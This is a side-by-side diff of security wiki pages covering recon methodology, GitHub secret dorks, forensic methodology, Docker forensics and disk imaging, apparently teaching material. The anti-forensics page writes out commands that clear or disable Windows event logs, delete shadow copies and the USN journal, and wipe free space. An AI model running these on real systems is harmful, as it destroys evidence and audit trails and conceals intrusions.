ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
``` ```
### **DNS Brute Force v2** ## **DNS Brute Force v2**
Once you have finished looking for subdomains you can use [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**,** [**altdns**](https://github.com/infosec-au/altdns) and [**gotator**](https://github.com/Josue87/gotator) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains. Once you have finished looking for subdomains you can use [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**,** [**altdns**](https://github.com/infosec-au/altdns) and [**gotator**](https://github.com/Josue87/gotator) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains.
### **Buckets Brute Force** ## **Buckets Brute Force**
While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../pentesting/pentesting-web/buckets/)**.**\ While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../pentesting/pentesting-web/buckets/)**.**\
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../pentesting/pentesting-web/buckets/). Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../pentesting/pentesting-web/buckets/).
### **Monitorization** ## **Monitorization**
You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does. You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does.
### **Looking for vulnerabilities** ## **Looking for vulnerabilities**
Check for possible [**subdomain takeovers**](../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\ Check for possible [**subdomain takeovers**](../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../pentesting/pentesting-web/buckets/). If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../pentesting/pentesting-web/buckets/).
@ -308,7 +308,7 @@ If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ _Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## Web servers hunting # Web servers hunting
> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers. > We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
@ -324,17 +324,17 @@ cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 an
cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443 cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443
``` ```
### **Screenshots** ## **Screenshots**
Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**. Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**.
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), \[shutter]\([**https://shutter-project.org/downloads/**](https://shutter-project.org/downloads/)) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), \[shutter]\([**https://shutter-project.org/downloads/**](https://shutter-project.org/downloads/)) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
### Cloud Assets ## Cloud Assets
Just with some **specific keywords** identifying the company it's possible to enumerate possible cloud assets belonging to them with tools like [**cloud\_enum**](https://github.com/initstring/cloud\_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) **or** [**cloudlist**](https://github.com/projectdiscovery/cloudlist)**.** Just with some **specific keywords** identifying the company it's possible to enumerate possible cloud assets belonging to them with tools like [**cloud\_enum**](https://github.com/initstring/cloud\_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) **or** [**cloudlist**](https://github.com/projectdiscovery/cloudlist)**.**
## Recapitulation 1 # Recapitulation 1
> Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done (will see more tricks later).\ > Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done (will see more tricks later).\
> Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that. > Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that.
@ -349,7 +349,7 @@ So you have already:
Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** (you can see a [guide for that here](../pentesting/pentesting-network/)), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open (this book already contains tons of information about possible vulnerabilities on a lot of common services). **But, don't forget that if the scope allows it, you should give it a try.** Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** (you can see a [guide for that here](../pentesting/pentesting-network/)), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open (this book already contains tons of information about possible vulnerabilities on a lot of common services). **But, don't forget that if the scope allows it, you should give it a try.**
### Github leaked secrets ## Github leaked secrets
{% content-ref url="github-leaked-secrets.md" %} {% content-ref url="github-leaked-secrets.md" %}
[github-leaked-secrets.md](github-leaked-secrets.md) [github-leaked-secrets.md](github-leaked-secrets.md)
@ -357,11 +357,11 @@ Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not goin
You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth\_key) You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth\_key)
### [**Pentesting Web Methodology**](../pentesting/pentesting-web/) ## [**Pentesting Web Methodology**](../pentesting/pentesting-web/)
Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../pentesting/pentesting-web/). Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../pentesting/pentesting-web/).
## Recapitulation 2 # Recapitulation 2
> Congratulations! The testing has finished! I hope you have find some vulnerabilities. > Congratulations! The testing has finished! I hope you have find some vulnerabilities.
@ -370,7 +370,7 @@ As you can see there is a lot of different vulnerabilities to search for.
**If you have find any vulnerability thanks to this book, please reference the book in your write-up.** **If you have find any vulnerability thanks to this book, please reference the book in your write-up.**
### **Automatic Tools** ## **Automatic Tools**
There are several tools out there that will perform part of the proposed actions against a given scope. There are several tools out there that will perform part of the proposed actions against a given scope.
@ -379,7 +379,7 @@ There are several tools out there that will perform part of the proposed actions
* [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw) * [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw)
* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated * [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated
## **References** # **References**
* **All free courses of** [**@Jhaddix**](https://twitter.com/Jhaddix) **(like** [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)**)** * **All free courses of** [**@Jhaddix**](https://twitter.com/Jhaddix) **(like** [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)**)**

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Github Leaked Secrets
Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits. Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
### Api keys leaks in github ## Api keys leaks in github
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) * [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber)
* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) * [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
@ -33,7 +31,7 @@ Now that we have built the list of assets of our scope it's time to search for s
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog) * [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
### **Dorks** ## **Dorks**
```bash ```bash
".mlab.com password" ".mlab.com password"

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Basic Forensic Methodology
{% hint style="danger" %} {% hint style="danger" %}
Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\ Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** [**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
@ -34,13 +32,13 @@ We are going to talk about partitions, file-systems, carving, memory, logs, back
So if you are doing a professional forensic analysis to some data or just playing a CTF you can find here useful interesting tricks. So if you are doing a professional forensic analysis to some data or just playing a CTF you can find here useful interesting tricks.
## Creating and Mounting an Image # Creating and Mounting an Image
{% content-ref url="image-adquisition-and-mount.md" %} {% content-ref url="image-adquisition-and-mount.md" %}
[image-adquisition-and-mount.md](image-adquisition-and-mount.md) [image-adquisition-and-mount.md](image-adquisition-and-mount.md)
{% endcontent-ref %} {% endcontent-ref %}
## Malware Analysis # Malware Analysis
This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**: This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**:
@ -48,7 +46,7 @@ This **isn't necessary the first step to perform once you have the image**. But
[malware-analysis.md](malware-analysis.md) [malware-analysis.md](malware-analysis.md)
{% endcontent-ref %} {% endcontent-ref %}
## Inspecting an Image # Inspecting an Image
if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in: if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
@ -70,7 +68,7 @@ Depending on the used OSs and even platform different interesting artifacts shou
[docker-forensics.md](docker-forensics.md) [docker-forensics.md](docker-forensics.md)
{% endcontent-ref %} {% endcontent-ref %}
## Deep inspection of specific file-types and Software # Deep inspection of specific file-types and Software
If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\ If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
Read the following page to learn some interesting tricks: Read the following page to learn some interesting tricks:
@ -85,19 +83,19 @@ I want to do a special mention to the page:
[browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md) [browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md)
{% endcontent-ref %} {% endcontent-ref %}
## Memory Dump Inspection # Memory Dump Inspection
{% content-ref url="memory-dump-analysis/" %} {% content-ref url="memory-dump-analysis/" %}
[memory-dump-analysis](memory-dump-analysis/) [memory-dump-analysis](memory-dump-analysis/)
{% endcontent-ref %} {% endcontent-ref %}
## Pcap Inspection # Pcap Inspection
{% content-ref url="pcap-inspection/" %} {% content-ref url="pcap-inspection/" %}
[pcap-inspection](pcap-inspection/) [pcap-inspection](pcap-inspection/)
{% endcontent-ref %} {% endcontent-ref %}
## **Anti-Forensic Techniques** # **Anti-Forensic Techniques**
Keep in mind the possible use of anti-forensic techniques: Keep in mind the possible use of anti-forensic techniques:
@ -105,7 +103,7 @@ Keep in mind the possible use of anti-forensic techniques:
[anti-forensic-techniques.md](anti-forensic-techniques.md) [anti-forensic-techniques.md](anti-forensic-techniques.md)
{% endcontent-ref %} {% endcontent-ref %}
## Threat Hunting # Threat Hunting
{% content-ref url="file-integrity-monitoring.md" %} {% content-ref url="file-integrity-monitoring.md" %}
[file-integrity-monitoring.md](file-integrity-monitoring.md) [file-integrity-monitoring.md](file-integrity-monitoring.md)

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Anti-Forensic Techniques # Timestamps
## Timestamps
An attacker may be interested in **changing the timestamps of files** to avoid being detected.\ An attacker may be interested in **changing the timestamps of files** to avoid being detected.\
It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` __ and __ `$FILE_NAME`. It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` __ and __ `$FILE_NAME`.
@ -28,11 +26,11 @@ Both attributes have 4 timestamps: **Modification**, **access**, **creation**, a
**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**. **Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**.
### TimeStomp - Anti-forensic Tool ## TimeStomp - Anti-forensic Tool
This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**. This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**.
### Usnjrnl ## Usnjrnl
The **USN Journal** (Update Sequence Number Journal), or Change Journal, is a feature of the Windows NT file system (NTFS) which **maintains a record of changes made to the volume**.\ The **USN Journal** (Update Sequence Number Journal), or Change Journal, is a feature of the Windows NT file system (NTFS) which **maintains a record of changes made to the volume**.\
It's possible to use the tool [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) to search for modifications of this record. It's possible to use the tool [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) to search for modifications of this record.
@ -41,7 +39,7 @@ It's possible to use the tool [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJ
The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file. The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file.
### $LogFile ## $LogFile
All metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging).\ All metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging).\
The logged metadata is stored in a file called “**$LogFile**”, which is found in a root directory of an NTFS file system.\ The logged metadata is stored in a file called “**$LogFile**”, which is found in a root directory of an NTFS file system.\
@ -60,19 +58,19 @@ Using the same tool it's possible to identify to **which time the timestamps wer
* MTIME: File's MFT registry modifiction * MTIME: File's MFT registry modifiction
* RTIME: File's access time * RTIME: File's access time
### `$STANDARD_INFORMATION` and `$FILE_NAME` comparison ## `$STANDARD_INFORMATION` and `$FILE_NAME` comparison
Another way to identify suspicions modified files would be to compare the time on both attributes looking for **mismatches**. Another way to identify suspicions modified files would be to compare the time on both attributes looking for **mismatches**.
### Nanoseconds ## Nanoseconds
**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**. **NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**.
### SetMace - Anti-forensic Tool ## SetMace - Anti-forensic Tool
This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME` . However, from Windows Vista it's necessary a live OS to modify this information. This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME` . However, from Windows Vista it's necessary a live OS to modify this information.
## Data Hiding # Data Hiding
NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the files is deleted. Then, it's possible to **hide data in this slack space**. NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the files is deleted. Then, it's possible to **hide data in this slack space**.
@ -82,24 +80,24 @@ There are tools like slacker that allows to hide data in this "hidden" space. Ho
Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this can of tools can save the content obfuscated or even encrypted. Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this can of tools can save the content obfuscated or even encrypted.
## UsbKill # UsbKill
This is a tool that will **turn off the computer is any change in the USB** ports is detected.\ This is a tool that will **turn off the computer is any change in the USB** ports is detected.\
A way to discover this would be to inspect the running processes and **review each python script running**. A way to discover this would be to inspect the running processes and **review each python script running**.
## Live Linux Distributions # Live Linux Distributions
These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion. These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion.
## Secure Deletion # Secure Deletion
[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization) [https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
## Windows Configuration # Windows Configuration
It's possible to disable several windows logging methods to make the forensics investigation much harder. It's possible to disable several windows logging methods to make the forensics investigation much harder.
### Disable Timestamps - UserAssist ## Disable Timestamps - UserAssist
This is a registry key that maintains dates and hours when each executable was run by the user. This is a registry key that maintains dates and hours when each executable was run by the user.
@ -108,7 +106,7 @@ Disabling UserAssist requires two steps:
1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled. 1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled.
2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`. 2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`.
### Disable Timestamps - Prefetch ## Disable Timestamps - Prefetch
This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices. This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices.
@ -118,7 +116,7 @@ This will save information about the applications executed with the goal of impr
* Select Modify on each of these to change the value from 1 (or 3) to 0 * Select Modify on each of these to change the value from 1 (or 3) to 0
* Restart * Restart
### Disable Timestamps - Last Access Time ## Disable Timestamps - Last Access Time
Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance. Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance.
@ -127,14 +125,14 @@ Whenever a folder is opened from an NTFS volume on a Windows NT server, the syst
3. Look for `NtfsDisableLastAccessUpdate`. If it doesnt exist, add this DWORD and set its value to 1, which will disable the process. 3. Look for `NtfsDisableLastAccessUpdate`. If it doesnt exist, add this DWORD and set its value to 1, which will disable the process.
4. Close the Registry Editor, and reboot the server. 4. Close the Registry Editor, and reboot the server.
### Delete USB History ## Delete USB History
All the **USB Device Entries** are stored in Windows Registry Under **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device in your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\ All the **USB Device Entries** are stored in Windows Registry Under **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device in your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\
You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them). You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them).
Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted. Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted.
### Disable Shadow Copies ## Disable Shadow Copies
**List** shadow copies with `vssadmin list shadowstorage`\ **List** shadow copies with `vssadmin list shadowstorage`\
**Delete** them running `vssadmin delete shadow` **Delete** them running `vssadmin delete shadow`
@ -151,24 +149,24 @@ To disable shadow copies:
It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
### Overwrite deleted files ## Overwrite deleted files
* You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive. * You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive.
* You can also use tools like [**Eraser**](https://eraser.heidi.ie) * You can also use tools like [**Eraser**](https://eraser.heidi.ie)
### Delete Windows event logs ## Delete Windows event logs
* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log" * Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log"
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"` * `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }` * `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
### Disable Windows event logs ## Disable Windows event logs
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` * `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
* Inside the services section disable the service "Windows Event Log" * Inside the services section disable the service "Windows Event Log"
* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl` * `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`
### Disable $UsnJrnl ## Disable $UsnJrnl
* `fsutil usn deletejournal /d c:` * `fsutil usn deletejournal /d c:`

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Docker Forensics # Container modification
## Container modification
There are suspicions that some docker container was compromised: There are suspicions that some docker container was compromised:
@ -66,7 +64,7 @@ If you find that **some suspicious file was added** you can access the container
docker exec -it wordpress bash docker exec -it wordpress bash
``` ```
## Images modifications # Images modifications
When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**: When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**:
@ -83,7 +81,7 @@ Then, you can **decompress** the image and **access the blobs** to search for su
tar -xf image.tar tar -xf image.tar
``` ```
### Basic Analysis ## Basic Analysis
You can get **basic information** from the image running: You can get **basic information** from the image running:
@ -104,7 +102,7 @@ alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpi
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
``` ```
### Dive ## Dive
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility: In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
@ -127,7 +125,7 @@ tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
``` ```
## Credentials from memory # Credentials from memory
Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef` Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef`

View file

@ -17,16 +17,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Baseline Monitoring # Baseline
## Baseline
A baseline consist on take a snapshot of certain part of a system in oder to c**ompare it with a future status to highlight changes**. A baseline consist on take a snapshot of certain part of a system in oder to c**ompare it with a future status to highlight changes**.
For example, you can calculate and store the hash of each file of the filesystem to .be able to find out which files were modified.\ For example, you can calculate and store the hash of each file of the filesystem to .be able to find out which files were modified.\
This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all. This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
### File Integrity Monitoring ## File Integrity Monitoring
File integrity monitoring is one of the most powerful techniques used to secure IT infrastructures and business data against a wide variety of both known and unknown threats.\ File integrity monitoring is one of the most powerful techniques used to secure IT infrastructures and business data against a wide variety of both known and unknown threats.\
The goal is to generate a **baseline of all the files** that you want monitor and then **periodically** **check** those files for possible **changes** (in the content, attribute, metadata...). The goal is to generate a **baseline of all the files** that you want monitor and then **periodically** **check** those files for possible **changes** (in the content, attribute, metadata...).
@ -35,12 +33,12 @@ The goal is to generate a **baseline of all the files** that you want monitor an
2\. **Real-time change notification**, which is typically implemented within or as an extension to the kernel of the operating system that will flag when a file is accessed or modified. 2\. **Real-time change notification**, which is typically implemented within or as an extension to the kernel of the operating system that will flag when a file is accessed or modified.
### Tools ## Tools
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
## References # References
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)

View file

@ -17,18 +17,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Image Adquisition & Mount # Acquisition
## Acquisition ## DD
### DD
```bash ```bash
#This will generate a raw copy of the disk #This will generate a raw copy of the disk
dd if=/dev/sdb of=disk.img dd if=/dev/sdb of=disk.img
``` ```
### dcfldd ## dcfldd
```bash ```bash
#Raw copy with hashes along the way (more secur s it checks hashes while it's copying the data) #Raw copy with hashes along the way (more secur s it checks hashes while it's copying the data)
@ -36,7 +34,7 @@ dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<c
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
``` ```
### FTK Imager ## FTK Imager
